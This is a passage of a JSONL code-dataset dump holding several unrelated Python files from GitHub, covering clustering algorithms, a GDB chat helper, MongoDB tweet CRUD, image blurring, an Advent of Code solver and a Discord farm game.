block)\n\t\tprint(labels)\n\t\tprint(np.unique(labels).shape[0])\n\t\tprint(\"num clusters: \", len(set(labels)))\n\t\tprint(\"time elapsed: %s \\n\"%(time() - t0))\n\n########################## Clustering Algorithms #######################\n\ndef variable_bw_mean_shift(X, bandwidth_array, seeds=None, max_iterations=300):\n\t\"\"\"Variable bandwidth mean shift with gaussian kernel\n\n\tParameters\n\t----------\n\tX : array-like, shape=[n_samples, n_features]\n\t\tInput data.\n\n\tbandwidth_array : array[float], shape=[n_samples]\n\t\tKernel bandwidth.\n\n\tseeds : array[float, float], shape=(n_seeds, n_features), optional\n\t\tPoint used as initial kernel locations. 
Default is\n\t\tsetting each point in input data as a seed.\n\n\tmax_iter : int, default 300\n\t\tMaximum number of iterations, per seed point before the clustering\n\t\toperation terminates (for that seed point), if has not converged yet.\n\n\tReturns\n\t-------\n\tcluster_centers : array, shape=[n_clusters, n_features]\n\t\tCoordinates of cluster centers.\n\n\tlabels : array, shape=[n_samples]\n\t\tCluster labels for each point.\n\n\tNotes\n\t-----\n\tCode adapted from scikit-learn library.\n\n\t\"\"\"\n\n\tif not seeds:\n\t\tseeds = X \n\n\tn_points, n_features = X.shape\n\tstop_thresh = 1e-3 * np.mean(bandwidth_array) # when mean has converged\n\tcenter_intensity_dict = {}\n\tcluster_centers = []\n\tball_tree = BallTree(X) # to efficiently look up nearby points\n\n\tdef gaussian_kernel(x, points, bandwidth):\n\t\tdistances = euclidean_distances(points, x)\n\t\tweights = np.exp(-1 * (distances ** 2 / bandwidth ** 2))\n\t\treturn np.sum(points * weights, axis=0) / np.sum(weights)\n\n\t# For each seed, climb gradient until convergence or max_iterations \n\tfor i, weighted_mean in enumerate(seeds):\n\t\tcompleted_iterations = 0\n\t\twhile True:\n\t\t\tpoints_within = X[ball_tree.query_radius([weighted_mean], bandwidth_array[i])[0]]\n\t\t\told_mean = weighted_mean # save the old mean \n\t\t\tweighted_mean = gaussian_kernel(old_mean, points_within, bandwidth_array[i])\n\t\t\tconverged = extmath.norm(weighted_mean - old_mean) < stop_thresh\n\n\t\t\tif converged or completed_iterations == max_iterations:\n\t\t\t\tif completed_iterations == max_iterations:\n\t\t\t\t\tprint(\"reached max iterations\")\n\t\t\t\tcluster_centers.append(weighted_mean)\n\t\t\t\tcenter_intensity_dict[tuple(weighted_mean)] = len(points_within)\n\t\t\t\tbreak\n\t\t\t\t \n\t\t\tcompleted_iterations += 1\n\n\t# POST PROCESSING: remove near duplicate points\n\t# If the distance between two kernels is less than the bandwidth,\n\t# then we have to remove one because it is a duplicate. 
Remove the\n\t# one with fewer points.\n\tsorted_by_intensity = sorted(center_intensity_dict.items(),\n\t\t\t\t\t\t\t\t key=lambda tup: tup[1], reverse=True)\n\tsorted_centers = np.array([tup[0] for tup in sorted_by_intensity])\n\tunique = np.ones(len(sorted_centers), dtype=np.bool)\n\tball_tree = BallTree(sorted_centers)\n\n\tfor i, center in enumerate(sorted_centers):\n\t\tif unique[i]:\n\t\t\tneighbor_idxs = ball_tree.query_radius([center], np.mean(bandwidth_array))[0]\n\t\t\tunique[neighbor_idxs] = 0\n\t\t\tunique[i] = 1 # leave the current point as unique\n\tcluster_centers = sorted_centers[unique]\n\n\t# ASSIGN LABELS: a point belongs to the cluster that it is closest to\n\tnbrs = NearestNeighbors(n_neighbors=1, algorithm='ball_tree').fit(cluster_centers)\n\tlabels = np.zeros(n_points, dtype=np.int)\n\tdistances, idxs = nbrs.kneighbors(X)\n\tlabels = idxs.flatten()\n\n\treturn cluster_centers, labels\n\ndef variable_eps_DBSCAN(X, eps_array, min_samples=5):\n\t\"\"\" Density-Based Spatial Clustering of Applications with Noise\n\n\tParameters\n\t----------\n\tX : array[float, float], shape=(n_samples,n_features)\n\t\tSimilarity matrix\n\n\teps_array : array[float], shape=(n_samples)\n\t\tThe maximum distance between two points for them to be considered \n\t\tto be in the same neighborhood, applied locally.\n\n\tReturns\n\t--------\n\tcluster_centers : array, shape=[n_clusters, n_features]\n\t\tCoordinates of cluster centers.\n\n\tlabels : array, shape=[n_samples]\n\t\tCluster labels for each point.\n\n\tNotes\n\t-----\n\tCode adapted from scikit-learn library \n\t\"\"\"\n\t# Calculate neighborhood for all samples. This leaves the original point\n\t# in, which needs to be considered later (i.e. point i is in the\n\t# neighborhood of point i. While True, its useless information)\n\tneighborhoods = np.array([np.where(x <= eps_array[i])[0] for i, x in enumerate(X)])\n\n\tn_neighbors = np.array([len(neighbors) for neighbors in neighborhoods])\n\n\t# Initially, all samples are noise.\n\tlabels = -np.ones(X.shape[0], dtype=np.intp)\n\n\t# A list of all core samples found.\n\tcore_samples = np.asarray(n_neighbors >= min_samples, dtype=np.uint8)\n\tdbscan_inner(core_samples, neighborhoods, labels)\n\n\treturn np.where(core_samples)[0], labels\n\n\n######################### Plotting ########################\n\ndef cluster_plot(data, labels):\n\tcolors = cycle('bgrcmyk')\n\tnum_clusters = len(np.unique(labels))\n\tprint(\"num clusters: \", num_clusters)\n\n\tfor i in range(num_clusters):\n\t\tto_plot = data[ np.where(labels == i) ]\n\t\tx_plot = to_plot[:, 0]\n\t\ty_plot = to_plot[:, 1]\n\t\tplt.scatter(x_plot, y_plot, c=next(colors))\n\n\tplot(data)\n\ndef plot(data):\n\tx = data[:, 0]\n\ty = data[:, 1]\n\tplt.axis([min(x), max(x),min(y),max(y)])\n\tplt.xlabel(\"DC1\")\n\tplt.ylabel(\"DC2\")\n\tplt.grid()\n\tplt.show()\n\tplt.savefig(\"%s_plot.png\"%filename, transparent=True, \n\t\t\t\tbbox_inches='tight', figsize=(3,3), dpi=300)\n\nif __name__ == \"__main__\":\n\tmain()\n\n\n# def calcProb(energy, temp=300):\n# \treturn np.exp(-energy / (k_b * temp))\n\n# def calcEntropy(num_states, probs):\n# \t\"\"\"\n# \t\tNotes\n# \t\t-----\n# \t\t\tDerived using stirling approximation of formal \n# \t\t\tdefinition of entropy.\n# \t\t\t..math -K_b N \\sum_{k=1}^{s}p_k \\ln p_k\n# \t\"\"\"\n# \treturn -k_b * num_states * np.sum(probs * 
np.log(probs))\n\n","repo_name":"rohanp/LDFMap","sub_path":"cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":10555,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"5207609904","text":"import json\nfrom posixpath import dirname\nfrom urllib.error import HTTPError, URLError\nfrom urllib.request import Request, urlopen\nfrom os.path import abspath, dirname\nfrom inspect import getfile, currentframe\n\n\ndef get_key():\n \"\"\"Gets api key from secret file\n\n Returns: (str) api key\n \"\"\"\n key = []\n secret = \"\"\n # gets path of this script - OS independent\n path = dirname(abspath(getfile(currentframe()))) + \"/.secret.txt\"\n try:\n # get appropriate api key\n with open(path) as f:\n key = [line.strip() for line in f]\n for k in key:\n if k.startswith(\"OPENAI_KEY\"):\n secret = k.split('\"')[1::2]\n except FileNotFoundError:\n print(\"Could not find api key. Please make sure you've run the CLI \"\n \"tool and set up your model\")\n quit(\"Exiting...\")\n\n return secret[0]\n\n\ndef get_model():\n \"\"\"Gets model from model file\n\n Returns: (str) model\n \"\"\"\n model = []\n model_name = \"\"\n # gets path of this script - OS independent\n path = dirname(abspath(getfile(currentframe()))) + \"/.model.txt\"\n try:\n # get appropriate api key\n with open(path) as f:\n model = [line.strip() for line in f]\n for m in model:\n if m.startswith(\"MODEL\"):\n model_name = m.split('\"')[1::2]\n except FileNotFoundError:\n print(\"Could not find model. Please make sure you've run the CLI \"\n \"tool and set up your model\")\n quit(\"Exiting...\")\n\n return model_name[0]\n\n\ndef make_request(url, headers=None, data=None):\n \"\"\"Makes API request\n\n Params:\n url (str): url to make request to\n headers (dict, optional): headers to send with request. Defaults to None.\n data (bytes, optional): data to send with request. Defaults to None.\n \"\"\"\n request = Request(url, headers=headers or {}, data=data)\n try:\n with urlopen(request, timeout=10) as response:\n return response.read(), response\n except HTTPError as error:\n print(error.status, error.reason)\n quit(\"Exiting...\")\n except URLError as error:\n print(error.reason)\n quit(\"Exiting...\")\n except TimeoutError:\n print(\"Request timed out\")\n quit(\"Exiting...\")\n\n\ndef chat_help():\n \"\"\"Prints help message for all available commands\"\"\"\n print(\n \"ChatGDB is a python script that defines some extra helpful GDB and \"\n \"LLDB commands. Before use, be sure to set up your api key using the \"\n \"CLI tool. The commands are as follows:\\n\\n\"\n \"chat: This command is used to generate GDB/LLDB commands based on plain \"\n \"English input. For example, 'chat stop my code at line 7' will \"\n \"generate the GDB command 'break 7'. Remember that in LLDB, many \"\n \"commands require filename information as well.\\n\\n\"\n \"explain: This command is used to generate explanations for either \"\n \"the previous command or a user query. 
'explain' with \"\n \"no arguments will generate an explanation for the previous command \"\n \"but typing a query after will generate an answer for it.\\n\\n\")\n\n\nHEADERS = {\n \"Authorization\": \"Bearer \" + get_key(),\n \"Content-Type\": \"application/json\"\n}\nURL = \"https://api.openai.com/v1/chat/completions\"\n\n\ndef explain_helper(prev_command, command, prompt):\n \"\"\"Generates explanation for either the previous command or a user query\n\n Params:\n prev_command (str): previous command\n command (str): user query\n prompt (str): prompt to use for explanation\n \"\"\"\n question = prompt + prev_command if command == \"\" else command\n data = {\"model\": get_model(),\n \"messages\": [{\"role\": \"user\",\n \"content\": question}]}\n body, response = make_request(URL, HEADERS, data=bytes(json.dumps(data),\n encoding=\"utf-8\"))\n body = json.loads(body)\n explanation = body['choices'][0]['message']['content']\n print(explanation)\n\n\ndef chat_helper(command, prompt):\n \"\"\"Generates GDB/LLDB command based on user input\n\n Params:\n command (str): user input\n prompt (str): prompt to use for command generation\n \"\"\"\n data = {\"model\": get_model(),\n \"messages\": [{\"role\": \"user\",\n \"content\": prompt + command}]}\n\n body, response = make_request(URL, HEADERS, data=bytes(json.dumps(data),\n encoding=\"utf-8\"))\n body = json.loads(body)\n command = body['choices'][0]['message']['content']\n print(command)\n # the first is technically also the previous command\n return command, command\n","repo_name":"pgosar/ChatGDB","sub_path":"chatgdb/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4706,"program_lang":"python","lang":"en","doc_type":"code","stars":882,"dataset":"github-code","pt":"48"} +{"seq_id":"25361729974","text":"# from flask_script import Manager\nfrom controller import create_app\n\n# 创建APP对象\napp = create_app('dev')\n# # 创建脚本管理\n# mgr = Manager(app)\n\n\nif __name__ == '__main__':\n # mgr.run()\n app.run(threaded=True, host=\"0.0.0.0\")\n\n","repo_name":"Kr1s77/flask-video-streaming-recorder","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":219,"dataset":"github-code","pt":"48"} +{"seq_id":"5864725651","text":"\"\"\"\nSimple scenario that wraps the node.form of an artificial within square brackets\nif it isn't already wrapped\n\"\"\"\n\nfrom udapi.core.block import Block\n\nclass WrapArtificials(Block):\n\n def process_node(self, node):\n if node.misc['NodeType'] == 'Artificial':\n if not node.form.startswith('['):\n node.form = f'[{node.form}]'\n","repo_name":"francescomambrini/Udapi_AGLDT","sub_path":"udapi_agldt/util/wrapartificials.py","file_name":"wrapartificials.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41160355671","text":"import motor.motor_asyncio\nfrom bson.objectid import ObjectId\nfrom decouple import config\n\nMONGO_DETAILS = config('MONGO_DETAILS')\n\nclient = motor.motor_asyncio.AsyncIOMotorClient(MONGO_DETAILS)\n\ndatabase = client.mongoDB\n\ntweet_coll = database.get_collection(\"tweet_collection\")\n\n\n# helpers\n\ndef tweet_helper(tweet) -> dict:\n return {\n \"_id\": str(tweet[\"_id\"]),\n \"tweet\": tweet[\"tweet\"],\n \"created_at\": tweet[\"created_at\"],\n }\n\n\n# Retrieve all tweets present in the database\nasync def retrieve_tweets():\n tweets = []\n async for tweet in tweet_coll.find():\n 
tweets.append(tweet_helper(tweet))\n return tweets\n\n\n# Add a new tweet into to the database\nasync def add_tweet(tweet_data: dict) -> dict:\n new_tweet = await tweet_coll.insert_one(tweet_data)\n return tweet_helper(tweet_data)\n\n\n# Retrieve a tweet with a matching ID\nasync def retrieve_tweet(id: str) -> dict:\n tweet = await tweet_coll.find_one({\"_id\": ObjectId(id)})\n if tweet:\n return tweet_helper(tweet)\n\n# Delete a tweet from the database\nasync def delete_tweet(id: str):\n tweet = await tweet_coll.find_one({\"_id\": ObjectId(id)})\n if tweet:\n await tweet_coll.delete_one({\"_id\": ObjectId(id)})\n return True\n return False\n\n# Update a tweet with a matching ID\nasync def update_tweet(id: str, data: dict):\n # Return false if an empty request body is sent.\n if len(data) < 1:\n return False\n tweet = await tweet_coll.find_one({\"_id\": ObjectId(id)})\n if tweet:\n updated_tweet = await tweet_coll.update_one(\n {\"_id\": ObjectId(id)}, {\"$set\": data}\n )\n if updated_tweet:\n return True\n return False\n","repo_name":"Jeromeschmidt/Tweet-gen-fastAPI","sub_path":"app/core/database/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17518575049","text":"import numpy as np\nimport cv2\nimport os.path\nimport sys\n\nDIR_PATH = os.path.join(os.path.dirname(__file__), '..')\nsys.path.append(DIR_PATH)\n\nfrom utils.prepare_data import read_image, write_image\nfrom Convolution.convolution import Convolution\n\ndef gauss2D(shape=(3,3),sigma= 3):\n \"\"\"\n 2D gaussian mask\n fspecial('gaussian',[shape],[sigma])\n \"\"\"\n try:\n m, n = [(x - 1.) / 2. for x in shape]\n y, x = np.ogrid[-m:m+1,-n:n+1]\n\n height = np.exp( -(x*x + y*y) / (2.*sigma*sigma) )\n height[ height < np.finfo(height.dtype).eps*height.max() ] = 0\n\n sum_height = np.sum(height)\n if sum_height != 0:\n height /= sum_height\n\n return height\n except EOFError as e:\n raise(e)\n\nclass Blur:\n \"\"\"\n Blur is class that can blur image\n Mean blur has parameters: mode = 1\n Gaussian blur has parameters: mode = 2\n \"\"\"\n def makeKernel(self, mode: int):\n try:\n if mode == 1:\n kernel = np.array([[1.0, 1.0, 1.0], [1.0, 1.0, 1.0], [1.0, 1.0, 1.0]]) /9\n elif mode == 2:\n kernel = np.array(gauss2D())\n else:\n kernel = None\n\n return kernel\n except EOFError as e:\n raise(e)\n\n def __init__(self, image, mode: int in [1, 2]):\n \"\"\"\n path: where is image in directory,\n mode: 1 (mean blur), 2 (gaussian blur)\n \"\"\"\n self.kernel = self.makeKernel(mode)\n self.image = image\n self.items = Convolution(self.kernel, self.image).items\n\nif __name__ == '__main__':\n print(\"Read image from path\")\n image = read_image(os.path.join(DIR_PATH+'/data/lena.png'), 1)\n blur_image = Blur(image, 1).items\n print(\"Write blur image\")\n write_image(os.path.join(DIR_PATH+'/data/blur-lena.png'), 1, blur_image)\n pass\n \n","repo_name":"truongcntn2017/ImageProcessing","sub_path":"Blur/blur.py","file_name":"blur.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"28351202297","text":"from features import AbstractFeature\nfrom visualize import ImagePlot\nfrom skimage.measure import regionprops, label\nfrom skimage import exposure, transform\nimport numpy as np\n\n\nclass ColorFeature(AbstractFeature):\n def process(self, img):\n # Extract blue regions\n rgb2yuv = np.array([[0.299, 0.587, 0.114], 
[-0.14713, -0.28886, 0.436], [0.615, -0.51499, -0.10001]])\n yuv = self.rescale_values(np.dot(img.image, rgb2yuv.T))\n white_img = self.extract_color(yuv[:, :, 0])\n red_img = self.extract_color(yuv[:, :, 2])\n blue_img = self.extract_color(yuv[:, :, 1])\n black_img = self.extract_color(1 - yuv[:, :, 0])\n size = min(img.image.shape[0], img.image.shape[1])\n ratio_img = transform.resize(img.image, [size, size])\n # RED WHITE OVERLAP\n overlap = red_img * white_img\n if np.sum(overlap) > 0:\n RGB_avg = self.relative_proportions(overlap, ratio_img)\n if np.abs(RGB_avg[0] - RGB_avg[1]) <= 0.2 and np.abs(RGB_avg[0] - RGB_avg[2]) <= 0.2:\n red_img -= overlap\n else:\n white_img -= overlap\n # BLUE WHITE OVERLAP\n overlap = blue_img * white_img\n if np.sum(overlap) > 0:\n RGB_avg = self.relative_proportions(overlap, ratio_img)\n if np.abs(RGB_avg[0] - RGB_avg[1]) <= 0.2 and np.abs(RGB_avg[0] - RGB_avg[2]) <= 0.2:\n blue_img -= overlap\n else:\n white_img -= overlap\n # RED BLACK OVERLAP\n overlap = red_img * black_img\n if np.sum(overlap) > 0:\n RGB_avg = self.relative_proportions(overlap, ratio_img)\n if np.abs(RGB_avg[0] - RGB_avg[1]) <= 0.2 and np.abs(RGB_avg[0] - RGB_avg[2]) <= 0.2:\n red_img -= overlap\n else:\n black_img -= overlap\n # BLUE BLACK OVERLAP\n overlap = blue_img * black_img\n if np.sum(overlap) > 0:\n RGB_avg = self.relative_proportions(overlap, ratio_img)\n if np.abs(RGB_avg[0] - RGB_avg[1]) <= 0.2 and np.abs(RGB_avg[0] - RGB_avg[2]) <= 0.2:\n blue_img -= overlap\n else:\n black_img -= overlap\n # RED BLUE OVERLAP\n overlap = blue_img * red_img\n if np.sum(overlap) > 0:\n RGB_avg = self.relative_proportions(overlap, ratio_img)\n if RGB_avg[0] - RGB_avg[2] > 0:\n blue_img -= overlap\n else:\n red_img -= overlap\n # WHITE BLACK OVERLAP\n overlap = black_img * white_img\n if np.sum(overlap) > 0:\n RGB_avg = self.relative_proportions(overlap, ratio_img)\n if (RGB_avg[0] + RGB_avg[1] + RGB_avg[2]) >= 0.5 * 3:\n white_img -= overlap\n else:\n black_img -= overlap\n return [np.mean(red_img), np.mean(blue_img), np.mean(black_img), np.mean(white_img)]\n\n def rescale_values(self, img):\n img[:, :, 1] = (img[:, :, 1] + 0.436)/(0.436 * 2)\n img[:, :, 2] = (img[:, :, 2] + 0.615)/(0.615 * 2)\n return img\n\n def relative_proportions(self, bw_img, img):\n sum = np.sum(bw_img)\n RGB_avg = [0, 0, 0]\n for i in range(len(RGB_avg)):\n mult_img = bw_img * img[:, :, i]\n RGB_avg[i] = np.sum(mult_img) / sum\n return RGB_avg / RGB_avg[0] # Normalize\n\n def extract_color(self, img, show=False):\n size = min(img.shape[0], img.shape[1])\n ratio_img = transform.resize(img, [size, size])\n width, height = ratio_img.shape\n # if exposure.is_low_contrast(ratio_img, fraction_threshold=0.45):\n ratio_img = exposure.equalize_hist(ratio_img)\n # gray_img *= (im.image[:, :, 0] > 150) * (im.image[:, :, 1] > 150) * (im.image[:, :, 2] > 150)\n # Find an appropriate threshold in order to extract white-like regions\n min_threshold = np.amin(ratio_img)\n max_threshold = np.amax(ratio_img)\n value_range = (max_threshold - min_threshold)\n threshold = value_range * 0.5 + min_threshold\n props = []\n max_iter = 1\n while (len(props) <= 2 or len(props) >= 10) and max_iter < 1000:\n # Filtered white image\n filtered_img = ratio_img > threshold\n # Divide in regions\n labeled_img = label(filtered_img) + 1\n # Filter out largest white region\n mult_img = np.multiply(labeled_img, filtered_img) # only whitish regions are considered\n props = regionprops(mult_img)\n props = [region for region in props if region.area > 0.01 
* width * height]\n # Adjust threshold boundaries and threshold\n too_less_regions = len(props) <= 2\n min_threshold = threshold if too_less_regions else min_threshold\n max_threshold = threshold if not too_less_regions else max_threshold\n threshold = threshold + value_range * 0.01 if too_less_regions else threshold - value_range * 0.01\n max_iter += 1\n # Extract largest white-like region\n # print(\"Threshold: %.2f\" % threshold)\n largest_region_img = np.zeros_like(ratio_img)\n if len(props) == 0:\n return largest_region_img\n max_region_coords = props[np.argmax([region.area for region in props])].coords\n largest_region_img[max_region_coords[:, 0], max_region_coords[:, 1]] = 1\n # Exclude white regions on the border\n excluded_border_img = np.ones_like(ratio_img)\n border_region_coords = np.array([coord.tolist() for coords in\n [region.coords for region in props if 0 in region.coords or\n width - 1 in region.coords[:, 0] or height - 1 in region.coords[:, 1]]\n for coord in coords])\n if len(border_region_coords) != 0:\n excluded_border_img[border_region_coords[:, 0], border_region_coords[:, 1]] = 0\n excluded_border_img *= filtered_img\n # Remove small regions\n exclude_small_img = np.zeros_like(ratio_img)\n excluded_small_coords = np.array([coord.tolist() for region in [region for region in props if region.area > 0.01*width*height]\n for coord in region.coords])\n exclude_small_img[excluded_small_coords[:, 0], excluded_small_coords[:, 1]] = 1\n # Only most central white region\n cx = width/2\n cy = height/2\n dx = width/5\n dy = height/5\n center_region_img = np.zeros_like(ratio_img)\n for region in props:\n keep = False\n for coord in region.coords:\n if cx - dx <= coord[0] <= cx + dx and cy - dy <= coord[1] <= cy + dy:\n keep = True\n break\n if keep:\n for coord in region.coords:\n center_region_img[coord[0], coord[1]] = 1\n # # Exclude regions with high saturation\n # hsv_img = HsvTransform().process(ratio_img)\n # filtered_hsv_img = hsv_img[:, :, 1] < 0.5\n # Combine images\n result = (exclude_small_img + excluded_border_img + largest_region_img + center_region_img) >= 3\n if show:\n print(\"Show of largest region\")\n ImagePlot().show(\"\", largest_region_img)\n print(\"Show of exclusion border\")\n ImagePlot().show(\"\", excluded_border_img)\n print(\"Show of removal small regions\")\n ImagePlot().show(\"\", exclude_small_img)\n print(\"Show of retaining center regions\")\n ImagePlot().show(\"\", center_region_img)\n # print(\"Filtered hsv image\")\n # ImagePlot().show(\"\", filtered_hsv_img)\n print(\"Show of result\")\n ImagePlot().show(\"TADA!\", result)\n\n return result\n","repo_name":"Zepheus/ml-traffic","sub_path":"features/color_feature.py","file_name":"color_feature.py","file_ext":"py","file_size_in_byte":7847,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"37037640008","text":"from collections import deque\n\n\ndef parse_input(file):\n data = open(file, \"r\").read().strip()\n data = [x for x in data.split(\"\\n\")]\n return data\n\n\ndef get_bliz_locs(g):\n # creates a dict with key of time (t)\n # contains locations of blizzards at next time (t + 1)\n # those are unsafe spots to move\n # because it will repeat, we only need enough entries for\n # the cycle which is height * width of area of field\n height = len(g)\n width = len(g[0])\n bliz_locs = {}\n for t in range(((height - 2) * (width - 2) + 1)):\n unsafe_locs = set()\n for row in range(height):\n for col in range(width):\n curr_item = 
g[row][col]\n                if curr_item == \">\":\n                    unsafe_locs.add((row, 1 + ((col - 1 + t) % (width - 2))))\n                elif curr_item == \"<\":\n                    unsafe_locs.add((row, 1 + ((col - 1 - t) % (width - 2))))\n                elif curr_item == \"v\":\n                    unsafe_locs.add((1 + ((row - 1 + t) % (height - 2)), col))\n                elif curr_item == \"^\":\n                    unsafe_locs.add((1 + ((row - 1 - t) % (height - 2)), col))\n        bliz_locs[t] = unsafe_locs\n    return bliz_locs\n\n\ntest_inp = \"test.txt\"\npuzz_inp = \"2022/inputs/24.txt\"\ncurr_inp = puzz_inp\n\ngrid = parse_input(curr_inp)\nmax_rows = len(grid)\nmax_cols = len(grid[0])\n\n# populate bliz_locs dict\nbliz_locs = get_bliz_locs(grid)\n\n# find start location\nr = 0\nc = grid[r].index(\".\")\n\nseen_states = set()\nstart_state = (r, c, 0, False, False) # row, col, time, seen_end, seen_start\nstates = deque([start_state])\npart1_finished = False\nwhile states:\n    (row, col, time, seen_end, seen_start) = states.popleft()\n    # if it isn't a valid spot, ignore it\n    # need this because we don't check when adding states\n    if not (0 <= row < max_rows and 0 <= col < max_cols and grid[row][col] != \"#\"):\n        continue\n    # once we are at the end,\n    # and have already been to the end and back to start,\n    # we are done with part 2\n    if row == max_rows - 1 and seen_start and seen_end:\n        print(\"Part 2:\", time)\n        break\n    # first time we reach the end, print result for part 1\n    if row == max_rows - 1 and (not part1_finished):\n        print(\"Part 1:\", time)\n        part1_finished = True\n    # mark when we've seen the end\n    if row == max_rows - 1:\n        seen_end = True\n    # if we have already seen the end, mark if we got back to start\n    if row == 0 and seen_end:\n        seen_start = True\n\n    # keep track of states we have already processed to avoid duplicates\n    if (row, col, time, seen_end, seen_start) in seen_states:\n        continue\n    seen_states.add((row, col, time, seen_end, seen_start))\n\n    # get where blizzards will be at next time (time cycles by area of field)\n    bliz_time = time % ((max_rows - 2) * (max_cols - 2))\n    avoid_locs = bliz_locs[bliz_time + 1]\n\n    # can we stay put?\n    if (row, col) not in avoid_locs:\n        states.append((row, col, time + 1, seen_end, seen_start))\n    # can we move right?\n    if (row, col + 1) not in avoid_locs:\n        states.append((row, col + 1, time + 1, seen_end, seen_start))\n    # can we move left?\n    if (row, col - 1) not in avoid_locs:\n        states.append((row, col - 1, time + 1, seen_end, seen_start))\n    # can we move up?\n    if (row - 1, col) not in avoid_locs:\n        states.append((row - 1, col, time + 1, seen_end, seen_start))\n    # can we move down?\n    if (row + 1, col) not in avoid_locs:\n        states.append((row + 1, col, time + 1, seen_end, seen_start))\n","repo_name":"MattMichaud/AoC","sub_path":"2022/code/24.py","file_name":"24.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"12449332000","text":"\ndef solve(s):\n    global ans # declare the variable we modify as global\n    for p in possible:\n        now = s + str(p)\n        ans = min(ans, len(now)+abs(n-int(now)))\n        if len(now) < 6:\n            solve(now)\n\nn = int(input())\nm = int(input())\nans = abs(n-100) # reach the target from 100 by pressing only +/-\nif m: # some buttons are broken\n    broken = list(map(int, input().split()))\n    # keep only the buttons that are not broken (use a set!)\n    possible = set(i for i in range(10))-set(broken)\n    solve('')\nelse: # no buttons are broken\n    ans = min(ans, 
len(str(n)))\n\n\nprint(ans)\n","repo_name":"yujing-kim/algorithm_coding_test","sub_path":"ps_python/joon/1107.py","file_name":"1107.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1866694465","text":"from bot.database.models import Farm as FarmModel\nfrom bot.database.models import PlantedCrop\nfrom bot.game.crop import Crop\nfrom bot.utils.constants import (\n FarmSizes,\n FARM_DIMENSIONS,\n PlotCoordinate,\n PlotActions,\n CROP_DATA,\n)\nfrom discord import Embed\nfrom typing import List, Optional\n\n\nclass Farm:\n def __init__(self, farm_id: int, size: FarmSizes, name: str):\n self.id = farm_id\n self.name = name\n self.size = size\n self.dimensions = FARM_DIMENSIONS.get(self.size)\n self.plot: List[List] = self.initialize_plot()\n\n @classmethod\n async def load(cls, player_id: int) -> \"Farm\":\n farm_model = await FarmModel.query.where(\n FarmModel.player_id == player_id\n ).gino.first()\n if farm_model is None:\n farm_model = await FarmModel.create(player_id=player_id)\n farm = Farm(\n farm_id=farm_model.id, size=FarmSizes(farm_model.size), name=farm_model.name\n )\n await farm.load_crops()\n return farm\n\n def initialize_plot(self) -> List[List[Optional[Crop]]]:\n return [\n [None for _ in range(self.dimensions.rows)]\n for _ in range(self.dimensions.columns)\n ]\n\n async def load_crops(self):\n crops = await PlantedCrop.query.where(PlantedCrop.farm_id == self.id).gino.all()\n for crop in crops:\n self.place_crop(\n Crop(\n id=crop.id,\n farm_id=crop.farm_id,\n crop_id=crop.crop_id,\n planted_at=crop.planted_at,\n ),\n row=crop.coord_row,\n column=crop.coord_column,\n )\n\n def validate_coordinate(self, row: int = None, column: int = None):\n if row is not None:\n if row >= self.dimensions.rows or row < 0:\n return False\n if column is not None:\n if column >= self.dimensions.columns or column < 0:\n return False\n return True\n\n def place_crop(self, crop: Crop, row: int, column: int):\n if not self.validate_coordinate(row=row, column=column):\n raise ValueError(\"Crop placement out of bounds\")\n self.plot[row][column] = crop\n\n async def work_plot(self, action: PlotActions, row: int, column: int, crop_id: int):\n if not self.validate_coordinate(row, column):\n return\n if self.plot[row][column] is not None:\n\n await self.plot[row][column].work(action)\n else:\n if action is PlotActions.PLANT:\n self.plot[row][column] = await Crop.new(\n farm_id=self.id, crop_id=crop_id, row=row, column=column\n )\n\n async def work_plots(\n self,\n action: PlotActions,\n coordinates: List[PlotCoordinate],\n crop_id: int = None,\n ):\n if not coordinates:\n for row in range(self.dimensions.rows):\n for column in range(self.dimensions.columns):\n await self.work_plot(\n action=action, row=row, column=column, crop_id=crop_id\n )\n\n for coordinate in coordinates:\n await self.work_plot(\n action=action,\n row=coordinate.row,\n column=coordinate.column,\n crop_id=crop_id,\n )\n\n def display(self):\n farm_land = \"\"\n for row in self.plot:\n for crop in row:\n if crop is None:\n farm_land += \"<:Crop_Land:753444938791911474>\" # Dirt Emoji\n continue\n farm_land += CROP_DATA[str(crop.crop_id)][\"stages\"][crop.state][\"emote\"]\n farm_land += \"\\n\"\n embed = Embed(title=self.name, description=farm_land)\n return embed\n\n def get_plots(self, planted: bool = True):\n crops = []\n for crop_row, row in enumerate(self.plot):\n for crop_column, crop in enumerate(row):\n if planted and crop 
is not None:\n crops.append(PlotCoordinate(crop_row, crop_column))\n else:\n if not planted and crop is None:\n crops.append(PlotCoordinate(crop_row, crop_column))\n return crops if crops else None\n","repo_name":"DiscordValley/TheValley","sub_path":"bot/game/farm.py","file_name":"farm.py","file_ext":"py","file_size_in_byte":4336,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"9972328897","text":"import json\nimport hashlib\n\nfrom moban import constants, exceptions\nfrom moban.externals import file_system\n\n\nclass HashStore:\n IGNORE_CACHE_FILE = False\n\n def __init__(self):\n self.cache_file = constants.DEFAULT_MOBAN_CACHE_FILE\n if (\n file_system.exists(self.cache_file)\n and self.IGNORE_CACHE_FILE is False\n ):\n with file_system.open_file(self.cache_file) as f:\n self.hashes = json.load(f)\n else:\n self.hashes = {}\n\n def is_file_changed(self, file_name, file_content, source_template):\n changed, with_permission = self._is_source_updated(\n file_name, file_content, source_template\n )\n\n if changed is False:\n target_hash = get_file_hash(\n file_name, with_permission=with_permission\n 